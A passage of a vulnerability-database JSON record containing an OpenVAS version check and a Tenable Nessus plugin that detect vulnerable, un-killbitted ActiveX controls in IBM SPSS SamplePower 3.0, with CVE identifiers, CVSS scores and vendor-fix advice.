script_tag(name:\"creation_date\", value:\"2013-05-08 11:50:37 +0530 (Wed, 08 May 2013)\");\n script_name(\"IBM SPSS SamplePower Multiple Vulnerabilities (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53234\");\n script_xref(name:\"URL\", value:\"http://www.ibm.com/support/docview.wss?uid=swg21635476\");\n script_xref(name:\"URL\", value:\"http://www.ibm.com/support/docview.wss?uid=swg21635515\");\n script_xref(name:\"URL\", value:\"http://www.ibm.com/support/docview.wss?uid=swg21635511\");\n script_xref(name:\"URL\", value:\"http://www.ibm.com/support/docview.wss?uid=swg21635503\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ibm_spss_sample_power_detect_win.nasl\");\n script_mandatory_keys(\"IBM/SPSS/Win/Installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to execute arbitrary\n code in the context of the application using the ActiveX control. Failed\n attempts will likely result in denial of service conditions.\");\n script_tag(name:\"affected\", value:\"IBM SPSS SamplePower version 3.0 and prior\");\n script_tag(name:\"insight\", value:\"Multiple flaws due to,\n\n - Unspecified error in the vsflex7l ActiveX control.\n\n - Unspecified flaw in the olch2x32 ActiveX control.\n\n - Error when handling the 'ComboList' or 'ColComboList' in Vsflex8l\n ActiveX control.\n\n - Error when handling the 'TabCaption' buffer in c1sizer ActiveX control.\");\n script_tag(name:\"solution\", value:\"Upgrade to IBM SPSS SamplePower version 3.0 FP1 (3.0.0.1) or later.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"This host is installed with IBM SPSS SamplePower and is prone\n to multiple vulnerabilities.\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif( version_is_less_equal( version:vers, test_version:\"3.0.0\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"3.0 FP1 (3.0.0.1)\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-09-14T15:39:38", "description": "The remote install of IBM SPSS SamplePower has a vulnerable version of\none or more ActiveX controls installed. 'Vsflex8l.ocx', 'c1sizer.ocx',\n'vsflex7l .ocx', and 'olch2x32.ocx' ActiveX controls have unspecified\narbitrary code execution vulnerabilities, which can be exploited by\ntricking a user into opening a specially crafted web page.", "edition": 23, "published": "2013-05-16T00:00:00", "title": "IBM SPSS SamplePower 3.0 < 3.0 FP 1 Multiple ActiveX Controls Arbitrary Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0593", "CVE-2012-5947", "CVE-2012-5946", "CVE-2012-5945"], "modified": "2013-05-16T00:00:00", "cpe": ["cpe:/a:ibm:spss_samplepower"], "id": "IBM_SPSS_SAMPLE_POWER_ACTIVEX.NASL", "href": "https://www.tenable.com/plugins/nessus/66473", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66473);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\n\n script_cve_id(\n \"CVE-2012-5945\",\n \"CVE-2012-5946\",\n \"CVE-2012-5947\",\n \"CVE-2013-0593\"\n );\n script_bugtraq_id(59527, 59556, 59557, 59559);\n\n script_name(english:\"IBM SPSS SamplePower 3.0 < 3.0 FP 1 Multiple ActiveX Controls Arbitrary Code Execution\");\n script_summary(english:\"Checks if ActiveX controls have been updated or disabled\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has multiple ActiveX controls with code execution\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote install of IBM SPSS SamplePower has a vulnerable version of\none or more ActiveX controls installed. 'Vsflex8l.ocx', 'c1sizer.ocx',\n'vsflex7l .ocx', and 'olch2x32.ocx' ActiveX controls have unspecified\narbitrary code execution vulnerabilities, which can be exploited by\ntricking a user into opening a specially crafted web page.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-092/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-099/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-100/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-101/\");\n # https://www.ibm.com/blogs/psirt/security-bulletin-ibm-spss-samplepower-olch2x32-activex-control-vulnerability-cve-2013-0593/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fef142e2\");\n # https://www.ibm.com/blogs/psirt/security-bulletin-ibm-spss-samplepower-vsflex7l-activex-control-vulnerability-cve-2012-5947/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5ef00761\");\n # https://www.ibm.com/blogs/psirt/security-bulletin-ibm-spss-samplepower-c1sizer-activex-control-vulnerability-cve-2012-5946/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?caa21312\");\n # https://www.ibm.com/blogs/psirt/security-bulletin-ibm-spss-samplepower-vsflex8l-activex-control-vulnerability-cve-2012-5945/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?64d1094a\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to IBM SPSS SamplePower 3.0 FP 1 or higher.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM SPSS SamplePower C1Tab ActiveX Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:spss_samplepower\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2020 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ibm_spss_sample_power_installed.nasl\");\n script_require_keys(\"SMB/ibm_spss_samplepower/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\napp = 'IBM SPSS SamplePower';\nkb_base = 'SMB/ibm_spss_samplepower/';\n\nport = kb_smb_transport();\n\nversion = get_kb_item_or_exit(kb_base + \"Version\");\npath = get_kb_item_or_exit(kb_base + \"Path\");\n\nif (version !~ \"^3\\.\")\n audit(AUDIT_INST_VER_NOT_VULN, app, version);\n\nkillbit_checks = make_list(\n '{92D71E93-25A8-11CF-A640-9986B64D9618}', # olch2x32.ocx\n '{C0A63B86-4B21-11D3-BD95-D426EF2C7949}', # vsflex7l.ocx\n '{24E04EBF-014D-471F-930E-7654B1193BA9}', # c1sizer.ocx\n '{0F026C11-5A66-4C2B-87B5-88DDEBAE72A1}' # vsflex8l.ocx\n);\n\ninfo = '';\n\nerror_list = make_list();\n\nforeach clsid (killbit_checks)\n{\n file = activex_get_filename(clsid:clsid);\n\n if (isnull(file))\n {\n error_list = make_list(error_list,\n 'activex_get_filename() for CLSID ' + clsid + ' failed.');\n continue;\n }\n\n\n if (!file)\n {\n error_list = make_list(error_list,\n 'ActiveX control for CLSID ' + clsid + ' not found.');\n continue;\n }\n\n # Get its version.\n version = activex_get_fileversion(clsid:clsid);\n if (!version)\n {\n error_list = make_list(error_list,\n 'Error getting version for ActiveX control with CLSID ' +\n clsid + '.');\n continue;\n }\n\n # per the patch, these controls should have kill bit set\n if (\n clsid != '{0F026C11-5A66-4C2B-87B5-88DDEBAE72A1}' && # vsflex8l.ocx\n activex_get_killbit(clsid:clsid) == 0\n )\n {\n info += '\\n Class identifier : ' + clsid +\n '\\n Filename : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : no fixed version available\\n';\n }\n\n # this control can have its kill bit unset if it is up to date\n if (\n clsid == '{0F026C11-5A66-4C2B-87B5-88DDEBAE72A1}' && # vsflex8l.ocx\n ver_compare(ver:version, fix:'8.0.20122.296') == -1 &&\n activex_get_killbit(clsid:clsid) == 0\n )\n {\n info += '\\n Class identifier : ' + clsid +\n '\\n Filename : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 8.0.20122.296\\n';\n }\n}\n\nactivex_end();\n\nreport = '';\n\nif (info != '')\n{\n # build report\n report += '\\nThe following vulnerable controls are installed and do not have a' +\n '\\nkill bit set :\\n' + info;\n\n if (max_index(error_list) > 0)\n {\n report += '\\nThe results for this plugin may be incomplete due to the following' +\n '\\nerrors:\\n';\n foreach var error (error_list)\n report += error + '\\n';\n }\n\n if (report_verbosity > 0) security_hole(extra:report, port:port);\n else security_hole(port);\n}\nelse\n{\n audit_msg = 'No vulnerable ActiveX controls found.\\n';\n\n if (max_index(error_list) > 0)\n {\n audit_msg += 'The results for this plugin may be incomplete due to the following errors:\\n';\n foreach error (error_list)\n audit_msg += error + '\\n';\n # errors, exit with failure\n exit(1, audit_msg);\n }\n\n # no errors, exit with success\n exit(0, audit_msg);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}